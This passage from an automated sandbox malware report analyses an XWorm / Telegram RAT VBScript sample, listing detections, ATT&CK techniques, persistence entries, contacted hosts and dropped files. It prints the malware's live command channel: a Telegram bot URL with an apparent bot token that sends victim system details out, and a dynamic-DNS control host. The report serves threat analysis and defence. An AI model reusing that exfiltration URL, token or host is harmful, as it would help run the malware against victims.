            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7480, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7532, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7912, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

            Remote Access Functionality

            barindex
            Yara detected Telegram RAT
            Source: Yara matchFile source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WindowsApp.exe PID: 1204, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7172, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7480, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7532, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7912, type: MEMORYSTR
            Yara detected XWorm
            Source: Yara matchFile source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WindowsApp.exe PID: 1204, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7172, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7480, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7532, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7912, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts12
            Windows Management Instrumentation            		221
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            Input Capture            		1
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		12
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory23
            System Information Discovery            		Remote Desktop Protocol1
            Input Capture            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		4
            Obfuscated Files or Information            		Security Account Manager441
            Security Software Discovery            		SMB/Windows Admin Shares1
            Clipboard Data            		11
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron21
            Registry Run Keys / Startup Folder            		21
            Registry Run Keys / Startup Folder            		12
            Software Packing            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture1
            Non-Standard Port            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets151
            Virtualization/Sandbox Evasion            		SSHKeylogging2
            Non-Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input Capture23
            Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
            Virtualization/Sandbox Evasion            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526836 Sample: SOA-injazfe-10424.vbs Startdate: 06/10/2024 Architecture: WINDOWS Score: 100 34 isika.ddns.net 2->34 36 api.telegram.org 2->36 38 3 other IPs or domains 2->38 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 56 12 other signatures 2->56 9 wscript.exe 2 2->9         started        13 task.exe 3 2->13         started        15 task.exe 2 2->15         started        17 3 other processes 2->17 signatures3 52 Uses dynamic DNS services 34->52 54 Uses the Telegram API (likely for C&C communication) 36->54 process4 file5 32 C:\Users\user\AppData\...\WindowsApp.exe, PE32 9->32 dropped 66 Benign windows process drops PE files 9->66 68 VBScript performs obfuscated calls to suspicious functions 9->68 70 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->70 19 WindowsApp.exe 15 6 9->19         started        72 Antivirus detection for dropped file 13->72 74 Machine Learning detection for dropped file 13->74 signatures6 process7 dnsIp8 40 ip-api.com 208.95.112.1, 49699, 80 TUT-ASUS United States 19->40 42 api.telegram.org 149.154.167.220, 443, 49701 TELEGRAMRU United Kingdom 19->42 44 isika.ddns.net 45.88.91.147, 49494, 49620, 49621 LVLT-10753US Bulgaria 19->44 30 C:\Users\user\AppData\Roaming\task.exe, PE32 19->30 dropped 58 Antivirus detection for dropped file 19->58 60 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->60 62 Machine Learning detection for dropped file 19->62 64 3 other signatures 19->64 24 schtasks.exe 1 19->24         started        26 WerFault.exe 19->26         started        file9 signatures10 process11 process12 28 conhost.exe 24->28         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SOA-injazfe-10424.vbs11%ReversingLabsDocument-HTML.Hacktool.Heuristic
            SOA-injazfe-10424.vbs100%AviraHTML/ExpKit.Gen2

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\WindowsApp.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Roaming\task.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\WindowsApp.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\task.exe100%Joe Sandbox ML

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://ip-api.com/line/?fields=hosting0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            isika.ddns.net
            		45.88.91.147
            		truetrue
              		unknown
              ip-api.com
              		208.95.112.1
              		truetrue
                		unknown
                api.telegram.org
                		149.154.167.220
                		truetrue
                  		unknown
                  198.187.3.20.in-addr.arpa
                  		unknown
                  		unknowntrue
                    		unknown
                    50.23.12.20.in-addr.arpa
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      isika.ddns.nettrue
                        		unknown
                        https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=7062075018&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A662C920EC437F040F44A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%201YPBEL4ES%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2true
                          		unknown
                          http://ip-api.com/line/?fields=hostingfalse
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/botWindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=70620WindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              208.95.112.1
                              		ip-api.comUnited States
                              		53334TUT-ASUStrue
                              149.154.167.220
                              		api.telegram.orgUnited Kingdom
                              		62041TELEGRAMRUtrue
                              45.88.91.147
                              		isika.ddns.netBulgaria
                              		10753LVLT-10753UStrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1526836
                              Start date and time:2024-10-06 16:44:07 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 45s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:26
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:SOA-injazfe-10424.vbs
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winVBS@12/9@6/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .vbs

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.189.173.22
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              • VT rate limit hit for: SOA-injazfe-10424.vbs

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              10:45:09API Interceptor2950581x Sleep call for process: WindowsApp.exe modified
                              12:21:43API Interceptor1x Sleep call for process: WerFault.exe modified
                              16:45:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run task C:\Users\user\AppData\Roaming\task.exe
                              16:45:10Task SchedulerRun new task: task path: C:\Users\user\AppData\Roaming\task.exe
                              16:45:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run task C:\Users\user\AppData\Roaming\task.exe
                              18:20:11AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\task.lnk

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              208.95.112.18QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                              • ip-api.com/line?fields=query,country
                              BootstrapperV1.19.exeGet hashmaliciousXWormBrowse
                              • ip-api.com/line/?fields=hosting
                              NewLoaderCracks_1.32.exeGet hashmaliciousDCRatBrowse
                              • ip-api.com/line/?fields=hosting
                              SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                              • ip-api.com/json/?fields=225545
                              SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                              • ip-api.com/json/?fields=225545
                              SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
                              • ip-api.com/json/?fields=225545
                              Aviso de cuenta vencida de DHL - 1606622076_865764325678976645423546567678967564423567890008765.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                              • ip-api.com/json/?fields=225545
                              POP.jsGet hashmaliciousWSHRATBrowse
                              • ip-api.com/json/
                              gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                              • ip-api.com/json/?fields=11827
                              149.154.167.220Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                    Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                        SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
                                          yvDk2VZluODBu6S.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            Payment Advice Note.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              Confirmation transfer AGS # 03-10-24.scr.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                Urgent inquiry for quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ip-api.com8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                  • 208.95.112.1
                                                  BootstrapperV1.19.exeGet hashmaliciousXWormBrowse
                                                  • 208.95.112.1
                                                  NewLoaderCracks_1.32.exeGet hashmaliciousDCRatBrowse
                                                  • 208.95.112.1
                                                  SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 208.95.112.1
                                                  SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 208.95.112.1
                                                  SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 208.95.112.1
                                                  Aviso de cuenta vencida de DHL - 1606622076_865764325678976645423546567678967564423567890008765.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 208.95.112.1
                                                  POP.jsGet hashmaliciousWSHRATBrowse
                                                  • 208.95.112.1
                                                  gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                                  • 208.95.112.1
                                                  api.telegram.orgQuote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                  • 149.154.167.220
                                                  Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 149.154.167.220
                                                  SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 149.154.167.220
                                                  yvDk2VZluODBu6S.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  Payment Advice Note.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 149.154.167.220
                                                  Confirmation transfer AGS # 03-10-24.scr.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 149.154.167.220
                                                  Urgent inquiry for quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  TELEGRAMRUhttps://bitvavo635.com/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.99
                                                  http://distrosourcess8.sg-host.com/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.99
                                                  http://peru-spost.shop/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.99
                                                  https://goteleg-br.top/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.99
                                                  http://telexxx-hot.vercel.app/Get hashmaliciousPorn ScamBrowse
                                                  • 149.154.167.99
                                                  Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                  • 149.154.167.220
                                                  Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 149.154.167.220
                                                  LVLT-10753USkUiqbpzmbo.exeGet hashmaliciousXWormBrowse
                                                  • 178.215.236.225
                                                  yakov.x86.elfGet hashmaliciousMiraiBrowse
                                                  • 168.215.26.13
                                                  Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 178.215.236.119
                                                  Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 178.215.236.119
                                                  Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 178.215.236.119
                                                  Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 178.215.236.119
                                                  VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 178.215.236.119
                                                  vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 178.215.236.119
                                                  s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 178.215.236.119
                                                  xkIXA8M8sC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 178.215.236.119
                                                  TUT-ASUS8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                  • 208.95.112.1
                                                  BootstrapperV1.19.exeGet hashmaliciousXWormBrowse
                                                  • 208.95.112.1
                                                  NewLoaderCracks_1.32.exeGet hashmaliciousDCRatBrowse
                                                  • 208.95.112.1
                                                  SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 208.95.112.1
                                                  SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 208.95.112.1
                                                  SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 208.95.112.1
                                                  Aviso de cuenta vencida de DHL - 1606622076_865764325678976645423546567678967564423567890008765.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 208.95.112.1
                                                  POP.jsGet hashmaliciousWSHRATBrowse
                                                  • 208.95.112.1
                                                  gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                                  • 208.95.112.1

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://pub-41ef3c62dc9e48a1b995d776997077b7.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220
                                                  https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4=Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  https://bdg.pages.dev/account/js-reporting?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220
                                                  https://ranjitkumarmehta1.github.io/netflix/Get hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220
                                                  https://chattts-49f1.beszyrecala.workers.dev/f9f981ac-a3fc-46ec-96fe-22=Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  https://business-center-helper.com/952267306393179Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  https://pub-c8190d91acc14cf6b49ba44dafc171ae.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220
                                                  https://pub-a3d3fc2664c9440a88e6fe93d30517c5.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220
                                                  https://pub-0c716a0b84164eff88c26766fe5472d7.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220
                                                  https://pub-f53c4a7a705a47b79ff74d8c24977253.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WindowsApp.exe_35e67699cba98b9d4552eb86ecf816a67b210_275cf164_57c4a53a-0b6e-4f30-8b26-70b835a78d94\Report.wer

                                                  Download File
                                                  Process:C:\Windows\System32\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):1.4596810633484414
                                                  Encrypted:false
                                                  SSDEEP:192:xXWGc6cGxAD0nk1IHYaW4UrZjC6lUCGwezuiFVZ24lO8L6q:hW16Tnk1vaQtjtUkezuiFVY4lO8O
                                                  MD5:A81209B884B5862BB4647DC4374F0468
                                                  SHA1:CFCB4A13F97DB3C620841C2EF44DBF8C5C592FBB
                                                  SHA-256:2EEA8D89114BBF48C49533FEE65246019B30BCB2CCCEF3D2AD24C60D918FC50C
                                                  SHA-512:09BAC851CC4CDB4D6110BC78AFC22BA4F689BAFD6CEAA3B4D167C97818F0AF16FBEF9EE7394E1B7C3E33BA8C6E708D5C2254536D185004AAB8789042D6CE4696
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.0.5.2.8.4.8.6.4.4.8.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.0.5.2.8.6.1.1.4.4.7.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.c.4.a.5.3.a.-.0.b.6.e.-.4.f.3.0.-.8.b.2.6.-.7.0.b.8.3.5.a.7.8.d.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.5.5.2.3.8.d.-.d.0.4.1.-.4.f.9.1.-.8.5.f.5.-.0.3.a.3.8.0.8.7.b.b.6.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.A.p.p...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.e.g.g.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.b.4.-.0.0.0.1.-.0.0.1.4.-.5.b.e.1.-.7.0.5.3.f.e.1.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.c.6.1.4.b.a.a.f.f.c.3.6.6.8.0.6.4.f.f.6.7.6.4.f.2.9.5.f.e.b.c.0.0.0.0.0.0.0.0.!.0.0.0.0.3.d.8.e.1.4.4.5.9.f.4.c.0.4.0.2.a.8.c.9.d.c.a.0.f.4.3.3.6.b.f.e.9.a.9.f.5.a.5.c.!.W.i.n.d.o.w.s.A.p.p...e.x.e...

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B9E.tmp.dmp

                                                  Download File
                                                  Process:C:\Windows\System32\WerFault.exe
                                                  File Type:Mini DuMP crash report, 16 streams, Sun Oct 6 16:21:25 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):822832
                                                  Entropy (8bit):2.966052473583583
                                                  Encrypted:false
                                                  SSDEEP:6144:X/dSfWY6n+01TzC/Lqm54L3QQALoLTJe:vdrYo6/LqmyQQALwTJ
                                                  MD5:35D2712CDEBDDCAD479D5F2C91232901
                                                  SHA1:4C83596CE20502B756954F667381BEA49C5AE65A
                                                  SHA-256:0E4ECAEAF9DE875AC96C30C25F2F6000D6990A6BB9A3186C56920E565AD1C9B1
                                                  SHA-512:DE7F02E0347DBC2A7A645A2B0A262C53D49483021DC71AF4A6BFA7E46ED1C04577CA874A8271A2655D2B8CFE620D32E126E92908135711C45C3AB6346B40472B
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:MDMP..a..... ..........g............t...........P,..........,....8....... ...:.......n..&...........l.......8...........T...............8............Z...........\..............................................................................eJ...... ]......Lw......................T...........n..g....'........................ ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F87.tmp.WERInternalMetadata.xml

                                                  Download File
                                                  Process:C:\Windows\System32\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):9136
                                                  Entropy (8bit):3.70159299089223
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJxeHX86Y6QriargmfZC76prL89baQr/if4em:R6lXJIs6Y9riargmfM7a0/if4
                                                  MD5:966A26FA4FD70ACDB67ACD8A7286FCCD
                                                  SHA1:DDE24149314465B315073AEB45766F57C6A42B3D
                                                  SHA-256:A80E03C7600DA4CE6FB154F115268E0B44C9D907BD115B011BA854ED87CCEA64
                                                  SHA-512:87F3B4D1A6BC9B416D5DE0CDC7A0FABBA93CCC6ED9342240059B762A520A1D52A0E588F6DCC27F43E01EBC63BF6E48C41F64BE50DE9E5F4A6247973F4696A3CD
                                                  Malicious:false
                                                  Reputation:low
